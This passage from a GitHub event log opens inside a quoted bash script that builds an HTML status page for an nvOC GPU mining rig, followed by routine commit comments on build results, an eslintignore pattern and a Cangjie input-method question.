s}')\r\n  hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep -o \"Total [0-9]*\" | awk '{print $2}' | grep -v grep | wc -l | awk '{print $1}')\r\n  HASH_AVERAGE=$((total_hash / hash_count))\r\n\r\nelif  ps ax | grep -q  \"[Z]ENEMYminer\" ;then\r\n  if tail -20 ${NVOC}/nvoc_logs/screenlog.0 | grep -q \"[M]H/s\"\r\n  then\r\n    total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Shares\" | grep \"[M]H/s\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o -E \"[0-9]*.[0-9]*MH/s\" | sed 's:MH/s::' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n    hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Shares\" | grep \"[M]H/s\" | wc -l | awk '{print $1}')\r\n    HASH_AVERAGE=\"$((total_hash / hash_count)) MH/s\"\r\n  elif tail -20 ${NVOC}/nvoc_logs/screenlog.0 | grep -q \"[k]H/s\"\r\n  then\r\n    total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Shares\" | grep \"[k]H/s\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o -E \"[0-9]*.[0-9]*kH/s\" | sed 's:kH/s::' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n    hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Shares\" | grep \"[k]H/s\" | wc -l | awk '{print $1}')\r\n    HASH_AVERAGE=\"$((total_hash / hash_count)) kH/s\"\r\n  fi\r\nfi\r\n##################################################################\r\n########################### WTM Hash Rate ########################\r\n\r\nif [[ $ALGO == ETHASH ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Beth_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == EQUIHASH ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Beq_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == NEOSCRYPT ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bns_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == CRYPTONIGHTV7 ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bcn7_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == CRYPTONIGHT ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bcn_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == LYRA2V2 ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Blrev2_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == BITCORE ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Btt10_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == X16R ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bx16r_hr%5D=[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == XEVAN ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bxn_hr%5D=[0-9].[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == PHI ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bphi_hr%5D=[0-9].[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == GROESTL ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bgro_hr%5D=[0-9].[0-9]*' | cut -f2- -d=)\r\n\r\nelif [[ $ALGO == LYRA2Z ]]\r\nthen\r\n  WTM_HASH=$(grep WTM_AUTO_SWITCH_URL ${NVOC}/1bash | grep -o '%5Bl2z_hr%5D=[0-9].[0-9]*' | cut -f2- -d=)\r\n\r\nelse\r\n  WTM_HASH=\"Not Available\"\r\nfi\r\n########################################################################\r\n########################### Miner ERROR Logs ###########################\r\n\r\nif  ps ax | grep -q \"[z]m_miner\"\r\nthen\r\n  MINER_ERROR=$(tail  -500 ${NVOC}/nvoc_logs/screenlog.0 | grep -E \"invalid|timeout|closed\" | tail -n $TAIL_GPU_COUNT |sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | awk '{print $0,\"<br>\"}')\r\n  REJECTED_SHARES=$(tail -1000 ${NVOC}/nvoc_logs/screenlog.0 |  grep  \"reject\" |  awk '{print $0,\"<br>\"}')\r\n\r\nelif  ps ax |  grep -q \"[c]laymore\"\r\nthen\r\n  MINER_ERROR=$(tail -n 100 ${NVOC}/nvoc_logs/screenlog.0 |  grep \"No new jobs\" | tail -n $TAIL_GPU_COUNT |  sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | awk '{print $0,\"<br>\"}')\r\n  if (( $(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep -o \"Rejected: [0-9]*\" | awk '{print $2}' |tail -1) > 0 ))\r\n  then\r\n    REJECTED_SHARES=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep -o \"Rejected: [0-9]*\" | tail -1 | awk '{print $2},\"<br>\"')\r\n  fi\r\n\r\nelse\r\n  MINER_ERROR=\"Send us your miner error logs to add\"\r\nfi\r\n\r\n###################################################################\r\n######################### BODY ####################################\r\n\r\necho '<body style=\"background-color:black; color:#4B5BC0 ;font-size: 16px \">' ; echo \"<strong>\"\r\necho \"<button>\"; echo '<a href=\"minerinfo\" class=\"button\">Refresh Miner Info</a>' ;echo \"</button>\" ;echo \"<button>\" ; echo '<a href=\"minerinfo?clearalerts\" class=\"button\">Clear Alerts</a>'; echo \"</button>\"\r\nif [[ $1 == clearalerts ]]\r\nthen\r\n  echo \"<tt style=\\\"text-align:left; color:green\\\">Alert history cleared <br/> </tt>\"\r\nfi\r\necho '<title>Worker: '$WORKERNAME'</title>'\r\necho '</head>'\r\necho '<body>'\r\necho '<h3>'  \"$nvOC_Ver\"\r\necho '<h4>'  \"Worker : \"\"<tt style=\\\"color:lime;\\\">\" $WORKERNAME \"</tt>\"  '</h4>'\r\n\r\n\r\n\r\necho '<h3>'  \"<tt style=\\\"color:White;\\\">\" Hardware and Systems States : \"</tt>\"  '</h3>'\r\n\r\n\r\necho \"Motherboard: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$mbvendor, $mbmodel, $mbversion<br> </tt>\"\r\n\r\necho \"BIOS Version, Date: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$biosver, $biosdate<br> </tt>\"\r\n\r\necho \"CPU: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$CPU<br> </tt>\"\r\n\r\necho \"CPU Load Average: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$AVRG_1, $AVRG_5, $AVRG_15 <br> </tt>\"\r\n\r\necho \"Boot Time: \" \"<tt style=\\\"text-align:left; color:lime; \\\">\" \"$SYSTEM_BOOT_TIME <br> </tt>\"\r\n\r\necho \"System Up Time: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$SYSTEM_UP_TIME <br> </tt>\"\r\n\r\necho \"Distro: \" \"<tt style=\\\"text-align:left; color:lime; \\\">\" \"$LSB_RELEASE $UNAME <br> </tt>\"\r\n\r\necho \"Disk / Free Disk: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$DISK / $DISK_FREE<br> </tt>\"\r\n\r\necho \"Memory / Free Memory: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$MEMORY / $FREE_MEMORY<br> </tt>\"\r\n\r\necho \"Nvidia Driver Version: \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$NIVIDIA_VERSION <br> </tt>\"\r\n\r\necho \"Gpu Count: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$GPU_COUNT <br> </tt>\"\r\n\r\n\r\n\r\necho '<h3>'  \"<tt style=\\\"color:White;\\\">\" Currently NVOC Mining Parameters and Commands  : \"</tt>\"  '</h3>'\r\n\r\necho \"NVOC root path: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"${NVOC} <br> </tt>\"\r\n\r\necho \"Miner Up Time: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$MINER_UP_TIME<br> </tt>\"\r\n\r\necho \"Auto Temp Control: \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$AUTO_TEMPERATURE_CONTROL$TEMP_CHECK$TEMP_WARNING <br> </tt>\"\r\n\r\necho \"Watch Dog: \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WATCHDOG$WDOG_CHECK$WATCHDOG_WARNING <br> </tt>\"\r\n\r\necho \"Auto Switcher: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$AUTO_SWITCH_TEXT <br></tt>\"\r\n\r\necho \"Currently Mining Coin: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$CURRENT_COIN <br> </tt>\"\r\n\r\necho \"Currently Mining ALGO: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$ALGO <br> </tt>\"\r\n\r\necho \"Mining Pool: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"${!COIN_POOL} <br> </tt>\"\r\n\r\necho \"Miner Command: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$MINER_CMD <br> </tt>\"\r\n\r\necho \"Reboot Required: \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$REBOOT_REQUIRED <br> </tt>\"\r\n\r\necho \"Power Limit Mode: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$POWERLIMIT_MODE <br> </tt>\"\r\n\r\necho \"Over Clock Mode: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$OVERCLOCK_MODE <br> </tt>\"\r\n\r\necho \"GPU Target Temp: \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$TARGET_TEMP <br> </tt>\"\r\n\r\necho \"GPU Minimum Fan Speed: \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$MINIMAL_FAN_SPEED <br> </tt>\"\r\n\r\necho \"GPU Utilization: \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$GPU_UTILIZATIONS <br> </tt>\"\r\n\r\n\r\necho '<h3>'  \"<tt style=\\\"color:White;\\\">\" WhatToMine switching parameters : \"</tt>\"  '</h3>'\r\n\r\necho \"Average Hash Rate: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$HASH_AVERAGE <br> </tt>\"\r\nif [[ $AUTO_SWITCH == WTM_SWITCHING ]]\r\nthen\r\n  echo \"$WTM_HASHRATE\" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_HASH <br> </tt>\"\r\nfi\r\n\r\necho \"$BTC_PRICE \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$BTC_PRICE_VALUE $WTM_CURRENCY<br> </tt>\"\r\n\r\necho \"$WTM_Current_Profitabilty\" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$P_WTM_PROFIT </tt>\"\r\n\r\necho \"$WTM_Current_Revenue\" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$P_WTM_REV </tt>\"\r\n\r\necho \"$Average_Revenue\" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$P_WTM_AVERAGE_REV   </tt>\"\r\n\r\necho \"WTM Sync Time Interval (min) : \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_AUTO_SWITCH_SYNC_INTERVAL <br> </tt>\"\r\n\r\necho \"WTM Webinfo Ckeck Interval (min): \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_PROFIT_CHECK_INTERVAL <br> </tt>\" \r\n\r\necho \"WTM Low Coin Difference (only in minimum minning time interval (%): \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_MIN_DIFFERENCE <br> </tt>\" \r\n\r\necho \"WTM minimum Mining Time (Seconds): \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_MINIMUM_MINING_TIME <br> </tt>\" \r\n\r\necho \"WTM Low Coin Difference When Minimum Mining time passed (%): \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_FORCE_SWITCH <br> </tt>\" \r\n\r\necho \"WTM Force Switch Coin Maximum difference (%): \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_PROFIT_CHECK_INTERVAL <br> </tt>\" \r\n\r\necho \"WTM Currency Displayed : \"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$WTM_CURRENCY <br> </tt>\" \r\n\r\n\r\necho '<h3>'  \"<tt style=\\\"color:White;\\\">\" Logs Extracts : \"</tt>\"  '</h3>'\r\n\r\necho \"$LAST_10_AUTO_SWITCHES  \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$P_MINING_HISTORY </tt>\"\r\n\r\necho \"Miner Hash Rate / Output: <br>\" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$MINER_LOG <br> </tt>\"\r\n\r\necho \"Miner Last Errors: <br>\" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$MINER_ERROR <br> </tt>\"\r\n\r\necho \"Rejected Shares: \" \"<tt style=\\\"text-align:left; color:red\\\">\" \"$REJECTED_SHARES <br> </tt> <br>\"\r\n\r\necho \"GPU Temp, Fan and Power Info: <br>\"  \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$TEMP_FAN_POWER <br> </tt>\"\r\n\r\necho \"GPU Temp, Fan and Power Alerts: <br>\"  \"<tt style=\\\"text-align:left; color:red\\\">\" \"$TEMP_ALERT_LOG <br> $LOST_GPU <br> </tt>\"\r\n\r\necho \"Watch Dog Alerts: <br>\"\r\n\r\necho \"<button>\"\r\necho '<a href=\"minerinfo?clearalerts\" class=\"button\">Clear Alerts</a>'\r\necho \"</button>\"\r\n\r\nif [[ $1 == clearalerts ]]\r\nthen\r\n  echo \"<tt style=\\\"text-align:left; color:green\\\">Alert history cleared <br/> </tt>\"\r\nfi\r\necho '<br/>' \"<tt style=\\\"text-align:left; color:red\\\">\" \"$WDOG_ALERT_LOG <br> </tt>\"\r\n\r\necho '<h3>'  \"<tt style=\\\"color:White;\\\">\" DEFINED POWER FOR EACH CARD : \"</tt>\"  '</h3>'\r\n\r\nif [[ $POWERLIMIT_MODE == \"GPU_SPECIFIC\" ]]\r\nthen\r\n  for i in $(seq 0 $((GPU_COUNT-1)))\r\n  do\r\n    echo \"GPU$i Power Limit: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$((INDIVIDUAL_POWERLIMIT_$i)) <br> </tt>\"\r\n  done\r\nelif [[ $POWERLIMIT_MODE == GLOBAL_with_GPU_OFFSET ]]\r\nthen\r\n  for i in $(seq 0 $((GPU_COUNT-1)))\r\n  do\r\n    echo \"GPU$i Power Limit: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$(( _POWERLIMIT_WATTS + INDIVIDUAL_POWERLIMIT_$i )) <br> </tt>\"\r\n  done\r\nelif [[ $POWERLIMIT_MODE == ALGO_SPECIFIC_with_GPU_OFFSET ]]\r\nthen\r\n  for i in $(seq 0 $((GPU_COUNT-1)))\r\n  do\r\n    echo \"GPU$i Power Limit: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$(( ${ALGO}_POWERLIMIT_WATTS + INDIVIDUAL_POWERLIMIT_$i ))<br> </tt>\"\r\n  done\r\nelse\r\n  echo \"Power Limit: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$GPU_PL <br> </tt>\"\r\nfi\r\n\r\necho '<h3>'  \"<tt style=\\\"color:White;\\\">\" DEFINED CORE CLOCKED AND MEMORY CLOCKS FOR EACH CARD : \"</tt>\"  '</h3>'\r\n\r\n\r\nif [[ $OVERCLOCK_MODE == \"GPU_SPECIFIC\" ]]\r\nthen\r\n  for i in $(seq 0 $((GPU_COUNT-1)))\r\n  do\r\n    echo \"GPU$i Core Overclock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$((__CORE_OVERCLOCK_$i)) <br> </tt>\"\r\n    echo \"GPU$i Memory Overclock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$((MEMORY_OVERCLOCK_$i)) <br> </tt>\"\r\n  done\r\nelif [[ $OVERCLOCK_MODE == \"GLOBAL_with_GPU_OFFSET\" ]]\r\nthen\r\n  for i in $(seq 0 $((GPU_COUNT-1)))\r\n  do\r\n    echo \"GPU$i Core Overclock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$(( _CORE_OVERCLOCK + __CORE_OVERCLOCK_$i)) <br> </tt>\"\r\n    echo \"GPU$i Memory Overclock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$(( _MEMORY_OVERCLOCK + MEMORY_OVERCLOCK_$i )) <br> </tt>\"\r\ndone\r\nelif [[ $OVERCLOCK_MODE == \"ALGO_SPECIFIC_with_GPU_OFFSET\" ]]\r\nthen\r\n  for i in $(seq 0 $((GPU_COUNT-1)))\r\n  do\r\n    echo \"GPU$i Core Overclock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$(( ${ALGO}_CORE_OVERCLOCK + __CORE_OVERCLOCK_$i )) <br> </tt>\"\r\n    echo \"GPU$i Memory Overclock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$(( ${ALGO}_MEMORY_OVERCLOCK + MEMORY_OVERCLOCK_$i )) <br> </tt>\"\r\ndone\r\nelse\r\n  echo \"Core Over Clock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$GPU_OC <br> </tt>\"\r\n  echo \"Memory Over Clock: \" \"<tt style=\\\"text-align:left; color:lime\\\">\" \"$GPU_MC <br> </tt>\"\r\nfi\r\n\r\n\r\necho \"</strong>\"\r\necho '</body>'\r\n\r\necho '</html>'\r\n\r\nexit 0\r\n\r\n```"}},"created_at":"2018-07-14T15:08:09Z"}
{"id":"7965913370","type":"CommitCommentEvent","actor":{"login":"danny0838"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29709616,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-14T15:08:16Z","updated_at":"2018-07-14T15:08:16Z","author_association":"NONE","body":"Unicode 只收「大戈」時支援「大戈」和「卜戈」，Unicode 收「大戈」和「卜戈」時只支援「卜戈」。Unicode 收的字形更多，我們支援的字形更少，這怎麼樣都說不過去吧？"}},"created_at":"2018-07-14T15:08:16Z"}
{"id":"7965913643","type":"CommitCommentEvent","actor":{"login":"Kundan0395"},"repo":{"name":"Kundan0395/Machine-Learning"},"payload":{"comment":{"id":29709617,"position":3,"line":3,"path":"Natural Language Processing","commit_id":"72375d747b03ca0d2ae3f065aa1ee0b35ada8929","created_at":"2018-07-14T15:08:28Z","updated_at":"2018-07-14T15:08:28Z","author_association":"OWNER","body":"Import"}},"created_at":"2018-07-14T15:08:28Z"}
{"id":"7965915145","type":"CommitCommentEvent","actor":{"login":"Skywol"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29709620,"position":4,"line":1433,"path":"nvchecker.ini","commit_id":"42d226dac9a6753aa58a1b8eb69609e8b209ac82","created_at":"2018-07-14T15:09:37Z","updated_at":"2018-07-14T15:09:37Z","author_association":"CONTRIBUTOR","body":"没注意deepin-wine，要不你稍微改下吧，在外面玩没带电脑呢。接管什么的并没有太大兴趣，只是有几个朋友要求加到cn，另外deepin-wine在kde桌面还是存在bug，有空再修修看\n\nSkywol Alia\n\n> 在 2018年7月13日，下午12:20，Jingbei Li <notifications@github.com> 写道：\n> \n> 另外如果你想接管deepin-{wechat, qq-im, baidu-pan}我没意见\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-14T15:09:37Z"}
{"id":"7965915159","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":29709621,"position":null,"line":null,"path":null,"commit_id":"9280b90fcd33dd7b895aecd5705bfd848a9388fa","created_at":"2018-07-14T15:09:38Z","updated_at":"2018-07-14T15:09:38Z","author_association":"MEMBER","body":"ok"}},"created_at":"2018-07-14T15:09:38Z"}
{"id":"7965915251","type":"CommitCommentEvent","actor":{"login":"mbabker"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29709622,"position":4,"line":2,"path":".eslintignore","commit_id":"32fe2a6bad3f607c18e4c77bc35c2b6f2ec63c25","created_at":"2018-07-14T15:09:43Z","updated_at":"2018-07-14T15:09:43Z","author_association":"MEMBER","body":"If it works similar to gitignore try this?\r\n\r\n```\r\n*.js\r\n!*.es6.js\r\n```"}},"created_at":"2018-07-14T15:09:43Z"}
{"id":"7965915413","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709623,"position":null,"line":null,"path":null,"commit_id":"f49d9383604b3922f43ded65291539b2cd40fc8e","created_at":"2018-07-14T15:09:49Z","updated_at":"2018-07-14T15:09:49Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 628\n\nregression Test Summary\n * Passed: 642\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.17%25-red.png)</a> \n"}},"created_at":"2018-07-14T15:09:49Z"}
{"id":"7965917177","type":"CommitCommentEvent","actor":{"login":"Kundan0395"},"repo":{"name":"Kundan0395/Machine-Learning"},"payload":{"comment":{"id":29709624,"position":null,"line":null,"path":null,"commit_id":"72375d747b03ca0d2ae3f065aa1ee0b35ada8929","created_at":"2018-07-14T15:11:06Z","updated_at":"2018-07-14T15:11:06Z","author_association":"OWNER","body":"Awesome"}},"created_at":"2018-07-14T15:11:06Z"}
{"id":"7965920470","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709627,"position":null,"line":null,"path":null,"commit_id":"ed96502e4217fd9e6cb38ce49e680477b3fe1a90","created_at":"2018-07-14T15:13:31Z","updated_at":"2018-07-14T15:13:31Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-10](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-10).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-10-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T15:13:31Z"}
{"id":"7965922419","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709631,"position":null,"line":null,"path":null,"commit_id":"f49d9383604b3922f43ded65291539b2cd40fc8e","created_at":"2018-07-14T15:14:59Z","updated_at":"2018-07-14T15:14:59Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T15:14:59Z"}
{"id":"7965926619","type":"CommitCommentEvent","actor":{"login":"alxpettit"},"repo":{"name":"NightKosh/Gravestone-mod-Graves"},"payload":{"comment":{"id":29709635,"position":null,"line":null,"path":null,"commit_id":"6170212aa11f4aa85b8cb88419822700f01b6e63","created_at":"2018-07-14T15:18:03Z","updated_at":"2018-07-14T15:18:03Z","author_association":"NONE","body":"Awesome work! Thanks. :3"}},"created_at":"2018-07-14T15:18:03Z"}
{"id":"7965926985","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709636,"position":null,"line":null,"path":null,"commit_id":"f49d9383604b3922f43ded65291539b2cd40fc8e","created_at":"2018-07-14T15:18:20Z","updated_at":"2018-07-14T15:18:20Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-45.12%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-14T15:18:20Z"}
{"id":"7965928734","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709638,"position":null,"line":null,"path":null,"commit_id":"0f1113b49c8f4ccf3c04acf6907758fd280b1f64","created_at":"2018-07-14T15:19:42Z","updated_at":"2018-07-14T15:19:42Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-148](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-148).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-148-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T15:19:42Z"}
{"id":"7965929770","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29709640,"position":null,"line":null,"path":null,"commit_id":"6433b3c3d849591bcc786ca99366c59a07b4785d","created_at":"2018-07-14T15:20:29Z","updated_at":"2018-07-14T15:20:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [002.2 Adicionar Dependência do Liquibase](https://trello.com/c/YoXIjctS/30-0022-adicionar-depend%C3%AAncia-do-liquibase)"}},"created_at":"2018-07-14T15:20:29Z"}
{"id":"7965932027","type":"CommitCommentEvent","actor":{"login":"dgrammatiko"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29709643,"position":4,"line":2,"path":".eslintignore","commit_id":"32fe2a6bad3f607c18e4c77bc35c2b6f2ec63c25","created_at":"2018-07-14T15:22:17Z","updated_at":"2018-07-14T15:22:17Z","author_association":"MEMBER","body":"That seems to work, thanks @mbabker "}},"created_at":"2018-07-14T15:22:17Z"}
{"id":"7965941950","type":"CommitCommentEvent","actor":{"login":"chenzquan"},"repo":{"name":"chenzquan/SchoolAnswer"},"payload":{"comment":{"id":29709661,"position":null,"line":null,"path":null,"commit_id":"e3fe95347f6decbc970c7df3b8715851336f8fe5","created_at":"2018-07-14T15:29:45Z","updated_at":"2018-07-14T15:29:45Z","author_association":"OWNER","body":"![image](https://github.com/chenzquan/SchoolAnswer/blob/master/%E8%BF%90%E8%A1%8C.gif)"}},"created_at":"2018-07-14T15:29:45Z"}
{"id":"7965944372","type":"CommitCommentEvent","actor":{"login":"madhunaga17"},"repo":{"name":"madhunaga17/com.trivago.de"},"payload":{"comment":{"id":29709665,"position":null,"line":null,"path":null,"commit_id":"032e2ad4a3ffe0fffff50fd74a7f4552e2b2d620","created_at":"2018-07-14T15:31:27Z","updated_at":"2018-07-14T15:31:27Z","author_association":"OWNER","body":"- Newsletter Subscription methods created in Homepage\r\n- Newsletter Subscription Script created\r\n- Newsletter Subscription class added in TestNG.xml\r\n"}},"created_at":"2018-07-14T15:31:27Z"}
